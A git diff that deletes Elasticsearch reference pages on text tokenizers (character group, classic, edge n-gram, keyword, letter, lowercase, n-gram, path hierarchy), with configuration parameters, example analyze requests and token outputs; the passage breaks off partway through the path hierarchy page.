a/docs/reference/analysis/tokenizers/chargroup-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/chargroup-tokenizer.asciidoc deleted file mode 100644 index 84a29dc5718..00000000000 --- a/docs/reference/analysis/tokenizers/chargroup-tokenizer.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[analysis-chargroup-tokenizer]] -=== Character group tokenizer -++++ -Character group -++++ - -The `char_group` tokenizer breaks text into terms whenever it encounters a -character which is in a defined set. It is mostly useful for cases where a simple -custom tokenization is desired, and the overhead of use of the <> -is not acceptable. - -[discrete] -=== Configuration - -The `char_group` tokenizer accepts one parameter: - -[horizontal] -`tokenize_on_chars`:: - A list containing a list of characters to tokenize the string on. Whenever a character - from this list is encountered, a new token is started. This accepts either single - characters like e.g. `-`, or character groups: `whitespace`, `letter`, `digit`, - `punctuation`, `symbol`. - -`max_token_length`:: - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": { - "type": "char_group", - "tokenize_on_chars": [ - "whitespace", - "-", - "\n" - ] - }, - "text": "The QUICK brown-fox" -} ---------------------------- - -returns - -[source,console-result] ---------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "QUICK", - "start_offset": 4, - "end_offset": 9, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 10, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox", - "start_offset": 16, - "end_offset": 19, - "type": "word", - "position": 3 - } - ] -} ---------------------------- diff --git a/docs/reference/analysis/tokenizers/classic-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/classic-tokenizer.asciidoc deleted file mode 100644 index f617fddb1bc..00000000000 --- a/docs/reference/analysis/tokenizers/classic-tokenizer.asciidoc +++ /dev/null @@ -1,263 +0,0 @@ -[[analysis-classic-tokenizer]] -=== Classic tokenizer -++++ -Classic -++++ - -The `classic` tokenizer is a grammar based tokenizer that is good for English -language documents. This tokenizer has heuristics for special treatment of -acronyms, company names, email addresses, and internet host names. However, -these rules don't always work, and the tokenizer doesn't work well for most -languages other than English: - -* It splits words at most punctuation characters, removing punctuation. However, a - dot that's not followed by whitespace is considered part of a token. - -* It splits words at hyphens, unless there's a number in the token, in which case - the whole token is interpreted as a product number and is not split. - -* It recognizes email addresses and internet hostnames as one token. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "classic", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, Foxes, jumped, over, the, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `classic` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - -[discrete] -=== Example configuration - -In this example, we configure the `classic` tokenizer to have a -`max_token_length` of 5 (for demonstration purposes): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "classic", - "max_token_length": 5 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, Foxes, jumpe, d, over, the, lazy, dog's, bone ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/edgengram-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/edgengram-tokenizer.asciidoc deleted file mode 100644 index 7bb66f3dd4d..00000000000 --- a/docs/reference/analysis/tokenizers/edgengram-tokenizer.asciidoc +++ /dev/null @@ -1,360 +0,0 @@ -[[analysis-edgengram-tokenizer]] -=== Edge n-gram tokenizer -++++ -Edge n-gram -++++ - -The `edge_ngram` tokenizer first breaks text down into words whenever it -encounters one of a list of specified characters, then it emits -{wikipedia}/N-gram[N-grams] of each word where the start of -the N-gram is anchored to the beginning of the word. - -Edge N-Grams are useful for _search-as-you-type_ queries. - -TIP: When you need _search-as-you-type_ for text which has a widely known -order, such as movie or song titles, the -<> is a much more efficient -choice than edge N-grams. Edge N-grams have the advantage when trying to -autocomplete words that can appear in any order. - -[discrete] -=== Example output - -With the default settings, the `edge_ngram` tokenizer treats the initial text as a -single token and produces N-grams with minimum length `1` and maximum length -`2`: - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "edge_ngram", - "text": "Quick Fox" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Q", - "start_offset": 0, - "end_offset": 1, - "type": "word", - "position": 0 - }, - { - "token": "Qu", - "start_offset": 0, - "end_offset": 2, - "type": "word", - "position": 1 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ Q, Qu ] ---------------------------- - -NOTE: These default gram lengths are almost entirely useless. You need to -configure the `edge_ngram` before using it. - -[discrete] -=== Configuration - -The `edge_ngram` tokenizer accepts the following parameters: - -`min_gram`:: - Minimum length of characters in a gram. Defaults to `1`. - -`max_gram`:: -+ --- -Maximum length of characters in a gram. Defaults to `2`. - -See <>. --- - -`token_chars`:: - - Character classes that should be included in a token. Elasticsearch - will split on characters that don't belong to the classes specified. - Defaults to `[]` (keep all characters). -+ -Character classes may be any of the following: -+ -* `letter` -- for example `a`, `b`, `ï` or `京` -* `digit` -- for example `3` or `7` -* `whitespace` -- for example `" "` or `"\n"` -* `punctuation` -- for example `!` or `"` -* `symbol` -- for example `$` or `√` -* `custom` -- custom characters which need to be set using the -`custom_token_chars` setting. - -`custom_token_chars`:: - - Custom characters that should be treated as part of a token. For example, - setting this to `+-_` will make the tokenizer treat the plus, minus and - underscore sign as part of a token. - -[discrete] -[[max-gram-limits]] -=== Limitations of the `max_gram` parameter - -The `edge_ngram` tokenizer's `max_gram` value limits the character length of -tokens. When the `edge_ngram` tokenizer is used with an index analyzer, this -means search terms longer than the `max_gram` length may not match any indexed -terms. - -For example, if the `max_gram` is `3`, searches for `apple` won't match the -indexed term `app`. - -To account for this, you can use the -<> token filter with a search analyzer -to shorten search terms to the `max_gram` character length. However, this could -return irrelevant results. - -For example, if the `max_gram` is `3` and search terms are truncated to three -characters, the search term `apple` is shortened to `app`. This means searches -for `apple` return any indexed terms matching `app`, such as `apply`, `snapped`, -and `apple`. - -We recommend testing both approaches to see which best fits your -use case and desired search experience. - -[discrete] -=== Example configuration - -In this example, we configure the `edge_ngram` tokenizer to treat letters and -digits as tokens, and to produce grams with minimum length `2` and maximum -length `10`: - -[source,console] ----------------------------- -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "edge_ngram", - "min_gram": 2, - "max_gram": 10, - "token_chars": [ - "letter", - "digit" - ] - } - } - } - } -} - -POST my-index-00001/_analyze -{ - "analyzer": "my_analyzer", - "text": "2 Quick Foxes." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Qu", - "start_offset": 2, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "Qui", - "start_offset": 2, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "Quic", - "start_offset": 2, - "end_offset": 6, - "type": "word", - "position": 2 - }, - { - "token": "Quick", - "start_offset": 2, - "end_offset": 7, - "type": "word", - "position": 3 - }, - { - "token": "Fo", - "start_offset": 8, - "end_offset": 10, - "type": "word", - "position": 4 - }, - { - "token": "Fox", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 5 - }, - { - "token": "Foxe", - "start_offset": 8, - "end_offset": 12, - "type": "word", - "position": 6 - }, - { - "token": "Foxes", - "start_offset": 8, - "end_offset": 13, - "type": "word", - "position": 7 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces the following terms: - -[source,text] ---------------------------- -[ Qu, Qui, Quic, Quick, Fo, Fox, Foxe, Foxes ] ---------------------------- - -Usually we recommend using the same `analyzer` at index time and at search -time. In the case of the `edge_ngram` tokenizer, the advice is different. It -only makes sense to use the `edge_ngram` tokenizer at index time, to ensure -that partial words are available for matching in the index. At search time, -just search for the terms the user has typed in, for instance: `Quick Fo`. - -Below is an example of how to set up a field for _search-as-you-type_. - -Note that the `max_gram` value for the index analyzer is `10`, which limits -indexed terms to 10 characters. Search terms are not truncated, meaning that -search terms longer than 10 characters may not match any indexed terms. - -[source,console] ------------------------------------ -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "autocomplete": { - "tokenizer": "autocomplete", - "filter": [ - "lowercase" - ] - }, - "autocomplete_search": { - "tokenizer": "lowercase" - } - }, - "tokenizer": { - "autocomplete": { - "type": "edge_ngram", - "min_gram": 2, - "max_gram": 10, - "token_chars": [ - "letter" - ] - } - } - } - }, - "mappings": { - "properties": { - "title": { - "type": "text", - "analyzer": "autocomplete", - "search_analyzer": "autocomplete_search" - } - } - } -} - -PUT my-index-00001/_doc/1 -{ - "title": "Quick Foxes" <1> -} - -POST my-index-00001/_refresh - -GET my-index-00001/_search -{ - "query": { - "match": { - "title": { - "query": "Quick Fo", <2> - "operator": "and" - } - } - } -} ------------------------------------ - -<1> The `autocomplete` analyzer indexes the terms `[qu, qui, quic, quick, fo, fox, foxe, foxes]`. -<2> The `autocomplete_search` analyzer searches for the terms `[quick, fo]`, both of which appear in the index. - -///////////////////// - -[source,console-result] ----------------------------- -{ - "took": $body.took, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.5753642, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.5753642, - "_source": { - "title": "Quick Foxes" - } - } - ] - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] -///////////////////// diff --git a/docs/reference/analysis/tokenizers/keyword-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/keyword-tokenizer.asciidoc deleted file mode 100644 index c4ee77458d8..00000000000 --- a/docs/reference/analysis/tokenizers/keyword-tokenizer.asciidoc +++ /dev/null @@ -1,109 +0,0 @@ -[[analysis-keyword-tokenizer]] -=== Keyword tokenizer -++++ -Keyword -++++ - -The `keyword` tokenizer is a ``noop'' tokenizer that accepts whatever text it -is given and outputs the exact same text as a single term. It can be combined -with token filters to normalise output, e.g. lower-casing email addresses. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "keyword", - "text": "New York" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "New York", - "start_offset": 0, - "end_offset": 8, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following term: - -[source,text] ---------------------------- -[ New York ] ---------------------------- - -[discrete] -[[analysis-keyword-tokenizer-token-filters]] -=== Combine with token filters -You can combine the `keyword` tokenizer with token filters to normalise -structured data, such as product IDs or email addresses. - -For example, the following <> request uses the -`keyword` tokenizer and <> filter to -convert an email address to lowercase. - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "keyword", - "filter": [ "lowercase" ], - "text": "john.SMITH@example.COM" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "john.smith@example.com", - "start_offset": 0, - "end_offset": 22, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The request produces the following token: - -[source,text] ---------------------------- -[ john.smith@example.com ] ---------------------------- - - -[discrete] -=== Configuration - -The `keyword` tokenizer accepts the following parameters: - -[horizontal] -`buffer_size`:: - - The number of characters read into the term buffer in a single pass. - Defaults to `256`. The term buffer will grow by this size until all the - text has been consumed. It is advisable not to change this setting. - diff --git a/docs/reference/analysis/tokenizers/letter-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/letter-tokenizer.asciidoc deleted file mode 100644 index c5b809fac1c..00000000000 --- a/docs/reference/analysis/tokenizers/letter-tokenizer.asciidoc +++ /dev/null @@ -1,124 +0,0 @@ -[[analysis-letter-tokenizer]] -=== Letter tokenizer -++++ -Letter -++++ - -The `letter` tokenizer breaks text into terms whenever it encounters a -character which is not a letter. It does a reasonable job for most European -languages, but does a terrible job for some Asian languages, where words are -not separated by spaces. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "letter", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, QUICK, Brown, Foxes, jumped, over, the, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `letter` tokenizer is not configurable. diff --git a/docs/reference/analysis/tokenizers/lowercase-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/lowercase-tokenizer.asciidoc deleted file mode 100644 index ffe44292c52..00000000000 --- a/docs/reference/analysis/tokenizers/lowercase-tokenizer.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[analysis-lowercase-tokenizer]] -=== Lowercase tokenizer -++++ -Lowercase -++++ - -The `lowercase` tokenizer, like the -<> breaks text into terms -whenever it encounters a character which is not a letter, but it also -lowercases all terms. It is functionally equivalent to the -<> combined with the -<>, but is more -efficient as it performs both steps in a single pass. - - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "lowercase", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `lowercase` tokenizer is not configurable. diff --git a/docs/reference/analysis/tokenizers/ngram-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/ngram-tokenizer.asciidoc deleted file mode 100644 index cd7f2fb7c74..00000000000 --- a/docs/reference/analysis/tokenizers/ngram-tokenizer.asciidoc +++ /dev/null @@ -1,312 +0,0 @@ -[[analysis-ngram-tokenizer]] -=== N-gram tokenizer -++++ -N-gram -++++ - -The `ngram` tokenizer first breaks text down into words whenever it encounters -one of a list of specified characters, then it emits -{wikipedia}/N-gram[N-grams] of each word of the specified -length. - -N-grams are like a sliding window that moves across the word - a continuous -sequence of characters of the specified length. They are useful for querying -languages that don't use spaces or that have long compound words, like German. - -[discrete] -=== Example output - -With the default settings, the `ngram` tokenizer treats the initial text as a -single token and produces N-grams with minimum length `1` and maximum length -`2`: - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "ngram", - "text": "Quick Fox" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Q", - "start_offset": 0, - "end_offset": 1, - "type": "word", - "position": 0 - }, - { - "token": "Qu", - "start_offset": 0, - "end_offset": 2, - "type": "word", - "position": 1 - }, - { - "token": "u", - "start_offset": 1, - "end_offset": 2, - "type": "word", - "position": 2 - }, - { - "token": "ui", - "start_offset": 1, - "end_offset": 3, - "type": "word", - "position": 3 - }, - { - "token": "i", - "start_offset": 2, - "end_offset": 3, - "type": "word", - "position": 4 - }, - { - "token": "ic", - "start_offset": 2, - "end_offset": 4, - "type": "word", - "position": 5 - }, - { - "token": "c", - "start_offset": 3, - "end_offset": 4, - "type": "word", - "position": 6 - }, - { - "token": "ck", - "start_offset": 3, - "end_offset": 5, - "type": "word", - "position": 7 - }, - { - "token": "k", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 8 - }, - { - "token": "k ", - "start_offset": 4, - "end_offset": 6, - "type": "word", - "position": 9 - }, - { - "token": " ", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 10 - }, - { - "token": " F", - "start_offset": 5, - "end_offset": 7, - "type": "word", - "position": 11 - }, - { - "token": "F", - "start_offset": 6, - "end_offset": 7, - "type": "word", - "position": 12 - }, - { - "token": "Fo", - "start_offset": 6, - "end_offset": 8, - "type": "word", - "position": 13 - }, - { - "token": "o", - "start_offset": 7, - "end_offset": 8, - "type": "word", - "position": 14 - }, - { - "token": "ox", - "start_offset": 7, - "end_offset": 9, - "type": "word", - "position": 15 - }, - { - "token": "x", - "start_offset": 8, - "end_offset": 9, - "type": "word", - "position": 16 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ Q, Qu, u, ui, i, ic, c, ck, k, "k ", " ", " F", F, Fo, o, ox, x ] ---------------------------- - -[discrete] -=== Configuration - -The `ngram` tokenizer accepts the following parameters: - -[horizontal] -`min_gram`:: - Minimum length of characters in a gram. Defaults to `1`. - -`max_gram`:: - Maximum length of characters in a gram. Defaults to `2`. - -`token_chars`:: - - Character classes that should be included in a token. Elasticsearch - will split on characters that don't belong to the classes specified. - Defaults to `[]` (keep all characters). -+ -Character classes may be any of the following: -+ -* `letter` -- for example `a`, `b`, `ï` or `京` -* `digit` -- for example `3` or `7` -* `whitespace` -- for example `" "` or `"\n"` -* `punctuation` -- for example `!` or `"` -* `symbol` -- for example `$` or `√` -* `custom` -- custom characters which need to be set using the -`custom_token_chars` setting. - -`custom_token_chars`:: - - Custom characters that should be treated as part of a token. For example, - setting this to `+-_` will make the tokenizer treat the plus, minus and - underscore sign as part of a token. - -TIP: It usually makes sense to set `min_gram` and `max_gram` to the same -value. The smaller the length, the more documents will match but the lower -the quality of the matches. The longer the length, the more specific the -matches. A tri-gram (length `3`) is a good place to start. - -The index level setting `index.max_ngram_diff` controls the maximum allowed -difference between `max_gram` and `min_gram`. - -[discrete] -=== Example configuration - -In this example, we configure the `ngram` tokenizer to treat letters and -digits as tokens, and to produce tri-grams (grams of length `3`): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "ngram", - "min_gram": 3, - "max_gram": 3, - "token_chars": [ - "letter", - "digit" - ] - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "2 Quick Foxes." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Qui", - "start_offset": 2, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "uic", - "start_offset": 3, - "end_offset": 6, - "type": "word", - "position": 1 - }, - { - "token": "ick", - "start_offset": 4, - "end_offset": 7, - "type": "word", - "position": 2 - }, - { - "token": "Fox", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 3 - }, - { - "token": "oxe", - "start_offset": 9, - "end_offset": 12, - "type": "word", - "position": 4 - }, - { - "token": "xes", - "start_offset": 10, - "end_offset": 13, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ Qui, uic, ick, Fox, oxe, xes ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/pathhierarchy-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/pathhierarchy-tokenizer.asciidoc deleted file mode 100644 index 321d33d6f7c..00000000000 --- a/docs/reference/analysis/tokenizers/pathhierarchy-tokenizer.asciidoc +++ /dev/null @@ -1,360 +0,0 @@ -[[analysis-pathhierarchy-tokenizer]] -=== Path hierarchy tokenizer -++++ -Path hierarchy -++++ - -The `path_hierarchy` tokenizer takes a hierarchical value like a filesystem -path, splits on the path separator, and emits a term for each component in the -tree. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "path_hierarchy", - "text": "/one/two/three" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "/one", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "/one/two", - "start_offset": 0, - "end_offset": 8, - "type": "word", - "position": 0 - }, - { - "token": "/one/two/three", - "start_offset": 0, - "end_offset": 14, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - - -The above text would produce the following terms: - -[source,text] ---------------------------- -[ /one, /one/two, /one/two/three ] ---------------------------- - -[discrete] -=== Configuration - -The `path_hierarchy` tokenizer accepts the following parameters: - -[horizontal] -`delimiter`:: - The character to use as the path separator. Defaults to `/`. - -`replacement`:: - An optional replacement character to use for the delimiter. - Defaults to the `delimiter`. - -`buffer_size`:: - The number of characters read into the term buffer in a single pass. - Defaults to `1024`. The term buffer will grow by this size until all the - text has been consumed. It is advisable not to change this setting. - -`reverse`:: - If set to `true`, emits the tokens in reverse order. Defaults to `false`. - -`skip`:: - The number of initial tokens to skip. Defaults to `0`. - -[discrete] -=== Example configuration - -In this example, we configure the `path_hierarchy` tokenizer to split on `-` -characters, and to replace them with `/`. The first two tokens are skipped: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "path_hierarchy", - "delimiter": "-", - "replacement": "/", - "skip": 2 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "one-two-three-four-five" -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "/three", - "start_offset": 7, - "end_offset": 13, - "type": "word", - "position": 0 - }, - { - "token": "/three/four", - "start_offset": 7, - "end_offset": 18, - "type": "word", - "position": 0 - }, - { - "token": "/three/four/five", - "start_offset": 7, - "end_offset": 23, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ /three, /three/four, /three/four/five ] ---------------------------- - -If we were to set `reverse` to `true`, it would produce the following: - -[source,text] ---------------------------- -[ one/two/three/, two/three/, three/ ] ---------------------------- - -[discrete] -[[analysis-pathhierarchy-tokenizer-detailed-examples]] -=== Detailed examples - -A common use-case for the `path_hierarchy` tokenizer is filtering results by -file paths. If indexing a file path along with the data, the use of the -`path_hierarchy` tokenizer to analyze the path allows filtering the results -by different parts of the file path string. - - -This example configures an index to have two custom analyzers and applies -those analyzers to multifields of the `file_path` text field that will -store filenames. One of the two analyzers uses reverse tokenization. -Some sample documents are then indexed to represent some file paths -for photos inside photo folders of two different users. - - -[source,console] --------------------------------------------------- -PUT file-path-test -{ - "settings": { - "analysis": { - "analyzer": { - "custom_path_tree": { - "tokenizer": "custom_hierarchy" - }, - "custom_path_tree_reversed": { - "tokenizer": "custom_hierarchy_reversed" - } - }, - "tokenizer": { - "custom_hierarchy": { - "type": "path_hierarchy", - "delimiter": "/" - }, - "custom_hierarchy_reversed": { - "type": "path_hierarchy", - "delimiter": "/", - "reverse": "true" - } - } - } - }, - "mappings": { - "properties": { - "file_path": { - "type": "text", - "fields": { - "tree": { - "type": "text", - "analyzer": "custom_path_tree" - }, - "tree_reversed": { - "type": "text", - "analyzer": "custom_path_tree_reversed" - } - } - } - } - } -} - -POST file-path-test/_doc/1 -{ - "file_path": "/User/alice/photos/2017/05/16/my_photo1.jpg" -} - -POST file-path-test/_doc/2 -{ - "file_path": "/User/alice/photos/2017/05/16/my_photo2.jpg" -} - -POST file-path-test/_doc/3 -{ - "file_path": "/User/alice/photos/2017/05/16/my_photo3.jpg" -} - -POST file-path-test/_doc/4 -{ - "file_path": "/User/alice/photos/2017/05/15/my_photo1.jpg" -} - -POST file-path-test/_doc/5 -{ - "file_path": "/User/bob/photos/2017/05/16/my_photo1.jpg" -} --------------------------------------------------- - - -A search for a particular file path string against the text field matches all -the example documents, with Bob's documents ranking highest due to `bob` also -being one of the terms created by the standard analyzer boosting relevance for -Bob's documents. - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "match": { - "file_path": "/User/bob/photos/2017/05" - } - } -} --------------------------------------------------- -// TEST[continued] - -It's simple to match or filter documents with file paths that exist within a -particular directory using the `file_path.tree` field. - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "term": { - "file_path.tree": "/User/alice/photos/2017/05/16" - } - } -} --------------------------------------------------- -// TEST[continued] - -With the reverse parameter for this tokenizer, it's also possible to match -from the other end of the file path, such as individual file names or a deep -level subdirectory. The following example shows a search for all files named -`my_photo1.jpg` within any directory via the `file_path.tree_reversed` field -configured to use the reverse parameter in the mapping. - - -[source,console] --------------------------------------------------- -GET file-path-test/_search -{ - "query": { - "term": { - "file_path.tree_reversed": { - "value": "my_photo1.jpg" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Viewing the tokens generated with both forward and reverse is instructive -in showing the tokens created for the same file path value. - - -[source,console] --------------------------------------------------- -POST file-path-test/_analyze -{ - "analyzer": "custom_path_tree", - "text": "/User/alice/photos/2017/05/16/my_photo1.jpg" -} - -POST file-path-test/_analyze -{ - "analyzer": "custom_path_tree_reversed", - "text": "/User/alice/photos/2017/05/16/my_photo1.jpg" -} --------------------------------------------------- -// 